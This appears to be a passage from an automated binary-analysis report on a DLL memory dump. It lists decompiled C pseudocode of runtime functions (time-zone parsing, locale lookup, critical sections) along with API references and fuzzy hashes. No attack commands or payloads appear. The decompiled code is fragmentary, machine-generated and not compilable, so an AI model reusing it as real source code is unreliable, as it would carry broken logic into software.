								if(_t85 == 0) {
									L26:
									_t107 = E6E20FBEC(_t118, _v32 + 4);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L19;
									} else {
										_v36 = _t107 + 4;
										_t118 =  &_v48;
										_t132 = 0;
										_t92 = E6E212B32( &_v48, 0, _t107 + 4, _v32, 0, 0xffffffff,  &_v48);
										_t145 = _t145 + 0x18;
										__eflags = _t92;
										if(_t92 == 0) {
											L33:
											_t133 = _v48;
											E6E20B46C(4);
											_pop(_t120);
											_v8 = _v8 & 0x00000000;
											_t138 = _t137 + _t137;
											_t128 =  *(_t133 + 0x24 + _t138 * 8);
											_t121 = _t120 | 0xffffffff;
											__eflags =  *(_t133 + 0x24 + _t138 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E6E20FBB2( *(_t133 + 0x24 + _t138 * 8));
													_pop(_t124);
													 *(_t133 + 0x24 + _t138 * 8) =  *(_t133 + 0x24 + _t138 * 8) & 0x00000000;
													_t121 = _t124 | 0xffffffff;
													__eflags = _t121;
												}
											}
											_t94 = _v40;
											__eflags =  *(_t94 + 0x350) & 0x00000002;
											if(( *(_t94 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x6e24b3d8 & 0x00000001;
												if(( *0x6e24b3d8 & 0x00000001) == 0) {
													__eflags =  *(_t133 + 0x24 + _t138 * 8);
													if( *(_t133 + 0x24 + _t138 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t121 == 1;
														if(_t121 == 1) {
															E6E20FBB2( *(_t133 + 0x24 + _t138 * 8));
															_t55 = _t133 + 0x24 + _t138 * 8;
															 *_t55 =  *(_t133 + 0x24 + _t138 * 8) & 0x00000000;
															__eflags =  *_t55;
														}
													}
												}
											}
											 *_t107 =  *((intOrPtr*)(_t133 + 0xc));
											 *(_t133 + 0x24 + _t138 * 8) = _t107;
											 *((intOrPtr*)(_t133 + 0x1c + _t138 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E6E20A232();
										} else {
											__eflags = _t92 - 0x16;
											if(_t92 == 0x16) {
												L30:
												_push(_t132);
												_push(_t132);
												_push(_t132);
												_push(_t132);
												_push(_t132);
												goto L24;
											} else {
												__eflags = _t92 - 0x22;
												if(_t92 != 0x22) {
													__eflags = _t92;
													if(_t92 == 0) {
														goto L33;
													} else {
														E6E20FBB2(_t107);
														goto L19;
													}
												} else {
													goto L30;
												}
											}
										}
									}
								} else {
									__eflags = _t85 - 0x16;
									if(_t85 == 0x16) {
										L23:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L24:
										_t85 = E6E208956();
									} else {
										__eflags = _t85 - 0x22;
										if(_t85 == 0x22) {
											goto L23;
										}
									}
									__eflags = _t85;
									if(_t85 != 0) {
										goto L19;
									} else {
										goto L26;
									}
								}
							} else {
								L19:
							}
							return E6E204AC6(_t128);
						} else {
							__eflags = _t74 - 0x22;
							if(_t74 == 0x22) {
								goto L17;
							} else {
								goto L9;
							}
						}
					}
				} else {
					_t77 = E6E211B7D(_t105, _t109, _a4, 0);
					L16:
					return _t77;
				}
			}





































    0x6e20a005
    0x6e20a005
    0x6e20a005
    0x6e20a005
    0x6e20a005
    0x6e20a007
    0x6e20a00c
    0x6e20a016
    0x6e20a01b
    0x6e20a01d
    0x6e20a021
    0x6e20a023
    0x6e20a029
    0x6e20a034
    0x6e20a034
    0x6e20a03b
    0x6e20a040
    0x6e20a046
    0x6e20a04b
    0x6e20a05b
    0x6e20a05c
    0x6e20a065
    0x6e20a06d
    0x6e20a072
    0x6e20a075
    0x6e20a077
    0x6e20a083
    0x6e20a08d
    0x6e20a090
    0x6e20a091
    0x6e20a093
    0x6e20a0c4
    0x6e20a0c5
    0x6e20a0cb
    0x00000000
    0x6e20a095
    0x6e20a09f
    0x6e20a0a4
    0x6e20a0a7
    0x6e20a0a9
    0x6e20a0c2
    0x00000000
    0x6e20a0ab
    0x6e20a0ab
    0x6e20a0ae
    0x00000000
    0x6e20a0b0
    0x6e20a0b0
    0x6e20a0b3
    0x00000000
    0x6e20a0b5
    0x00000000
    0x6e20a0b5
    0x6e20a0b3
    0x6e20a0ae
    0x6e20a0a9
    0x6e20a079
    0x6e20a079
    0x6e20a07c
    0x6e20a0d3
    0x6e20a0d3
    0x6e20a0d4
    0x6e20a0d5
    0x6e20a0d6
    0x6e20a0d7
    0x6e20a0d8
    0x6e20a0dd
    0x6e20a0e5
    0x6e20a0ea
    0x6e20a0ed
    0x6e20a0f1
    0x6e20a0f7
    0x6e20a0f8
    0x6e20a0fa
    0x6e20a0fc
    0x6e20a105
    0x6e20a10a
    0x6e20a110
    0x6e20a113
    0x6e20a116
    0x6e20a11b
    0x6e20a12a
    0x6e20a12f
    0x6e20a132
    0x6e20a134
    0x6e20a14e
    0x6e20a15b
    0x6e20a15d
    0x6e20a15f
    0x00000000
    0x6e20a161
    0x6e20a164
    0x6e20a167
    0x6e20a172
    0x6e20a175
    0x6e20a17a
    0x6e20a17d
    0x6e20a17f
    0x6e20a1a2
    0x6e20a1a2
    0x6e20a1a7
    0x6e20a1ac
    0x6e20a1ad
    0x6e20a1b1
    0x6e20a1b3
    0x6e20a1b7
    0x6e20a1ba
    0x6e20a1bc
    0x6e20a1c0
    0x6e20a1c4
    0x6e20a1ca
    0x6e20a1cf
    0x6e20a1d0
    0x6e20a1d5
    0x6e20a1d5
    0x6e20a1d5
    0x6e20a1c4
    0x6e20a1d8
    0x6e20a1db
    0x6e20a1e2
    0x6e20a1e4
    0x6e20a1eb
    0x6e20a1f1
    0x6e20a1f3
    0x6e20a1f5
    0x6e20a1f9
    0x6e20a1fa
    0x6e20a200
    0x6e20a206
    0x6e20a206
    0x6e20a206
    0x6e20a206
    0x6e20a1fa
    0x6e20a1f3
    0x6e20a1eb
    0x6e20a20e
    0x6e20a210
    0x6e20a217
    0x6e20a21b
    0x6e20a222
    0x6e20a181
    0x6e20a181
    0x6e20a184
    0x6e20a18b
    0x6e20a18b
    0x6e20a18c
    0x6e20a18d
    0x6e20a18e
    0x6e20a18f
    0x00000000
    0x6e20a186
    0x6e20a186
    0x6e20a189
    0x6e20a192
    0x6e20a194
    0x00000000
    0x6e20a196
    0x6e20a197
    0x00000000
    0x6e20a19c
    0x00000000
    0x00000000
    0x00000000
    0x6e20a189
    0x6e20a184
    0x6e20a17f
    0x6e20a136
    0x6e20a136
    0x6e20a139
    0x6e20a140
    0x6e20a140
    0x6e20a141
    0x6e20a142
    0x6e20a143
    0x6e20a144
    0x6e20a145
    0x6e20a145
    0x6e20a13b
    0x6e20a13b
    0x6e20a13e
    0x00000000
    0x00000000
    0x6e20a13e
    0x6e20a14a
    0x6e20a14c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e20a14c
    0x6e20a0fe
    0x6e20a0fe
    0x6e20a0fe
    0x6e20a22e
    0x6e20a07e
    0x6e20a07e
    0x6e20a081
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e20a081
    0x6e20a07c
    0x6e20a04d
    0x6e20a052
    0x6e20a0cf
    0x6e20a0d2
    0x6e20a0d2

    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(?,?,6E20A016,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001,?,?,?,?,?,?,?,6E200044), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
    • _abort.LIBCMT ref: 6E20A03B
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_abort$_free
    • String ID:
    • API String ID: 997063059-0
    • Opcode ID: 833e59e4fa1943252877203a3c0a4e080cec241e767ee1480b36b8d6024459bb
    • Instruction ID: 2594dda4b54d1f66b9b64960a57a795fb29d1bd79bcb84d6e418219ee50dde9b
    • Opcode Fuzzy Hash: 833e59e4fa1943252877203a3c0a4e080cec241e767ee1480b36b8d6024459bb
    • Instruction Fuzzy Hash: 42D05E76D4A61DEBDB05ABE08609BCE77676F01B2AF244644C1202B2C0CB714F00DE91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20B46C, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E20B46C(signed int _a4) {
				struct _CRITICAL_SECTION* _t3;

				_t3 = 0x6e2e3410 + _a4 * 0x18;
				EnterCriticalSection(_t3); // executed
				return _t3;
			}




    0x6e20b475
    0x6e20b47b
    0x6e20b482

    APIs
    • RtlEnterCriticalSection.NTDLL(-6E2E2E05,?,6E20DBFE,00000000,6E2494C8,0000000C,6E20DBB9,6E1F73C4,?,?,6E20FB88,6E1F73C4,?,6E20FABB,00000001,00000364), ref: 6E20B47B
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CriticalEnterSection
    • String ID:
    • API String ID: 1904992153-0
    • Opcode ID: fe708d8cbc8325281eab31ec234beb2e9a4c7b25d18c15b6b72ca94225f8c6b2
    • Instruction ID: 1ea4571c61180151adb579b0974c54c977fb60e53d6f86d1be50e40c632ff092
    • Opcode Fuzzy Hash: fe708d8cbc8325281eab31ec234beb2e9a4c7b25d18c15b6b72ca94225f8c6b2
    • Instruction Fuzzy Hash: 9FB022B200030CAB8E00AA88CE0EE82BB0EA0C02003808020B80CCB022CA32E32080A0
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 6E213009, Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
    Download Yara Rule
    C-Code - Quality: 71%
    			E6E213009(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				void* _t148;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E6E212C48();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6E212CA6( &_v8) != 0 || E6E212C4E( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E208956();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6E212C48();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6E212CA6( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E208956();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6e24b164; // 0x1dc3c76f
						_v100 = _t74 ^ _t192;
						 *0x6e24b474 =  *0x6e24b474 | 0xffffffff;
						 *0x6e24b468 =  *0x6e24b468 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6e2e38c8 = 0;
						_t78 = E6E21D077(_t143, _t167, __eflags,  &_v360,  &_v356, 0x100, 0x6e23ffb4);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6E20FBEC(_t143, _v276);
								_pop(_t148);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6E21D077(_t148, _t167, __eflags,  &_v280, _t184, _v276, 0x6e23ffb4);
									__eflags = _t85;
									if(_t85 == 0) {
										E6E20FBB2(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E6E20FBB2();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E6E213009(0x6e23ffb4, _t172, _t183, __eflags);
							}
						}
						E6E20FBB2(_t183);
						__eflags = _v16 ^ _t192;
						return E6E203D51(_v16 ^ _t192);
					} else {
						_t89 = E6E212C4E( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6E212C7A( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6E20FBB2( *0x6e2e38c4);
								 *0x6e2e38c4 = 0;
								 *_t194 = 0x6e2e38d0;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6e2e38d0 * 0x3c;
									_t168 =  *0x6e2e3924; // 0x0
									_push(_t171);
									 *0x6e2e38c8 = 1;
									_v12 = _t150;
									__eflags =  *0x6e2e3916; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6e2e396a; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6e2e3978; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6E20B6F0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6e2e38d4, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6e2e3928, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6E212C42()) = _v12;
								 *((intOrPtr*)(E6E212C36())) = _v16;
								_t96 = E6E212C3C();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6e2e38c4; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6E20FBB2(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6e2133fa
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6e2133fb
						 *0x6e2e38c4 = E6E20FBEC(_t154 - _t170, _t13);
						_t116 = E6E20FBB2(0);
						_t167 =  *0x6e2e38c4; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6e2133fa
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6e2133fb
							_t119 = E6E20EBB9(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6E21D133(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6E20F5B7(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6E20F5B7(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6E20F5B7(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6E212C42()) = _v8;
										_t128 = E6E212C36();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6E21D133(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}





































































    0x6e213009
    0x6e213009
    0x6e213013
    0x6e213018
    0x6e21301c
    0x6e21301e
    0x6e213026
    0x6e213031
    0x6e2131d1
    0x6e2131d3
    0x6e2131d4
    0x6e2131d5
    0x6e2131d6
    0x6e2131d7
    0x6e2131d8
    0x6e2131dd
    0x6e2131e1
    0x6e2131e3
    0x6e2131e6
    0x6e2131ed
    0x6e2131f4
    0x6e2131f8
    0x6e2131fb
    0x6e2131fe
    0x6e213203
    0x6e213204
    0x6e213206
    0x6e21332e
    0x6e21332e
    0x6e21332f
    0x6e213330
    0x6e213331
    0x6e213332
    0x6e213333
    0x6e213338
    0x6e21333b
    0x6e21333c
    0x6e213344
    0x6e21334b
    0x6e21334e
    0x6e21335b
    0x6e213362
    0x6e213363
    0x6e213364
    0x6e21336a
    0x6e213379
    0x6e213380
    0x6e213388
    0x6e21338a
    0x6e213394
    0x6e213397
    0x6e2133a4
    0x6e2133a6
    0x6e2133a7
    0x6e2133a9
    0x6e2133c2
    0x6e2133ca
    0x6e2133cc
    0x6e2133d2
    0x6e2133d7
    0x6e2133ce
    0x6e2133ce
    0x00000000
    0x6e2133ce
    0x6e2133ab
    0x6e2133ab
    0x6e2133ac
    0x6e2133ac
    0x6e2133ac
    0x6e2133d9
    0x6e21338c
    0x6e21338c
    0x6e21338c
    0x6e2133e6
    0x6e2133e8
    0x6e2133ea
    0x6e2133ec
    0x6e2133fc
    0x6e2133fc
    0x6e2133ee
    0x6e2133ee
    0x6e2133f1
    0x00000000
    0x6e2133f3
    0x6e2133f3
    0x6e2133f4
    0x6e2133f9
    0x6e2133f1
    0x6e213402
    0x6e21340d
    0x6e213418
    0x6e21320c
    0x6e213210
    0x6e213215
    0x6e213216
    0x6e213218
    0x00000000
    0x6e21321e
    0x6e213222
    0x6e213227
    0x6e213228
    0x6e21322a
    0x00000000
    0x6e213230
    0x6e213236
    0x6e21323b
    0x6e213241
    0x6e213248
    0x6e21324e
    0x6e213251
    0x6e213257
    0x6e21325e
    0x6e213264
    0x6e213268
    0x6e21326e
    0x6e213271
    0x6e213278
    0x6e21327d
    0x6e21327d
    0x6e21327f
    0x6e21327f
    0x6e213282
    0x6e213289
    0x6e2132a1
    0x6e2132a1
    0x6e2132a4
    0x6e21328b
    0x6e21328b
    0x6e213290
    0x6e213292
    0x00000000
    0x6e213294
    0x6e213296
    0x6e21329c
    0x6e21329c
    0x6e213292
    0x6e2132ac
    0x6e2132c0
    0x6e2132c6
    0x6e2132c8
    0x6e2132d6
    0x6e2132d8
    0x6e2132ca
    0x6e2132ca
    0x6e2132cd
    0x00000000
    0x6e2132cf
    0x6e2132d1
    0x6e2132d1
    0x6e2132cd
    0x6e2132ed
    0x6e2132f4
    0x6e2132f6
    0x6e213305
    0x6e213308
    0x6e2132f8
    0x6e2132f8
    0x6e2132fb
    0x00000000
    0x6e2132fd
    0x6e213300
    0x6e213300
    0x6e2132fb
    0x6e2132f6
    0x6e213312
    0x6e21331c
    0x6e213321
    0x6e213326
    0x6e21332d
    0x6e21332d
    0x6e21322a
    0x6e213218
    0x6e213049
    0x6e213049
    0x6e21304f
    0x6e213054
    0x6e21308a
    0x6e21308b
    0x6e213091
    0x6e213093
    0x6e213093
    0x6e213096
    0x6e213096
    0x6e213098
    0x6e213099
    0x6e21309f
    0x6e2130aa
    0x6e2130af
    0x6e2130b4
    0x6e2130be
    0x00000000
    0x6e2130c4
    0x6e2130c4
    0x6e2130c6
    0x6e2130c7
    0x6e2130c7
    0x6e2130ca
    0x6e2130ca
    0x6e2130cc
    0x6e2130cd
    0x6e2130d4
    0x6e2130d9
    0x6e2130de
    0x6e2130e3
    0x6e2130eb
    0x6e2130ec
    0x6e2130f2
    0x6e2130f7
    0x6e2130fc
    0x6e213102
    0x6e213107
    0x6e213108
    0x6e21310b
    0x00000000
    0x00000000
    0x00000000
    0x6e21310b
    0x6e213110
    0x6e213111
    0x6e213116
    0x6e213118
    0x6e213118
    0x6e213120
    0x6e213126
    0x6e213129
    0x6e213129
    0x6e21312d
    0x00000000
    0x00000000
    0x6e213137
    0x6e213137
    0x6e21313a
    0x6e21313d
    0x6e21313f
    0x6e21314d
    0x6e21314f
    0x6e213159
    0x6e213159
    0x6e21315b
    0x6e21315d
    0x00000000
    0x00000000
    0x6e213154
    0x6e213156
    0x6e213158
    0x6e213158
    0x00000000
    0x6e213158
    0x00000000
    0x6e213156
    0x6e21315f
    0x6e213162
    0x6e213164
    0x6e21316f
    0x6e213171
    0x6e21317b
    0x6e21317b
    0x6e21317d
    0x6e21317f
    0x00000000
    0x00000000
    0x6e213176
    0x6e213178
    0x6e21317a
    0x6e21317a
    0x00000000
    0x6e21317a
    0x00000000
    0x6e213178
    0x6e21317b
    0x6e213162
    0x6e213181
    0x6e213181
    0x6e213183
    0x6e213187
    0x6e213187
    0x6e21318c
    0x6e21318e
    0x6e213191
    0x6e213194
    0x6e213196
    0x6e213199
    0x6e2131b1
    0x6e2131b4
    0x6e2131b7
    0x6e2131bf
    0x6e2131c4
    0x6e2131c9
    0x00000000
    0x6e2131c9
    0x6e21319b
    0x6e2131a0
    0x6e2131a3
    0x6e2131a8
    0x6e2131ab
    0x6e2131ad
    0x00000000
    0x00000000
    0x6e2131af
    0x6e2130fc
    0x00000000
    0x6e2130e3
    0x6e213056
    0x6e213056
    0x6e213058
    0x6e21305a
    0x6e21305a
    0x6e21305e
    0x00000000
    0x00000000
    0x6e213062
    0x6e213076
    0x6e213076
    0x6e213064
    0x6e213064
    0x6e213064
    0x6e21306a
    0x00000000
    0x6e21306c
    0x6e21306c
    0x6e21306f
    0x6e213074
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e213074
    0x6e21306a
    0x6e21307f
    0x6e213081
    0x6e2131d0
    0x6e2131d0
    0x6e213087
    0x6e213087
    0x00000000
    0x6e213087
    0x00000000
    0x6e213081
    0x6e21307a
    0x6e21307c
    0x6e21307c
    0x00000000
    0x6e21307c
    0x6e213054
    0x00000000

    APIs
    • _free.LIBCMT ref: 6E21308B
    • _free.LIBCMT ref: 6E2130AF
    • _free.LIBCMT ref: 6E213236
    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E23FFB4), ref: 6E213248
    • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2E38D4,000000FF,00000000,0000003F,00000000,?,?), ref: 6E2132C0
    • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2E3928,000000FF,?,0000003F,00000000,?), ref: 6E2132ED
    • _free.LIBCMT ref: 6E213402
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ByteCharMultiWide$InformationTimeZone
    • String ID:
    • API String ID: 314583886-0
    • Opcode ID: 6bdbeb5af87d51ae6fdf6fd3c67abf72a652b57b297dc5575835e4e0a0bd2b22
    • Instruction ID: 95f329ee6c3532852eada83fa1acc29091dd7a6dd6719c10c42b92bad18b7b1d
    • Opcode Fuzzy Hash: 6bdbeb5af87d51ae6fdf6fd3c67abf72a652b57b297dc5575835e4e0a0bd2b22
    • Instruction Fuzzy Hash: BDC12876A0C24EEFEB008FE88858ADA7BFFBF46315F154499D69097290D7308B41C750
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21CB2F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E6E21CB2F(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e241648;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e241650;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
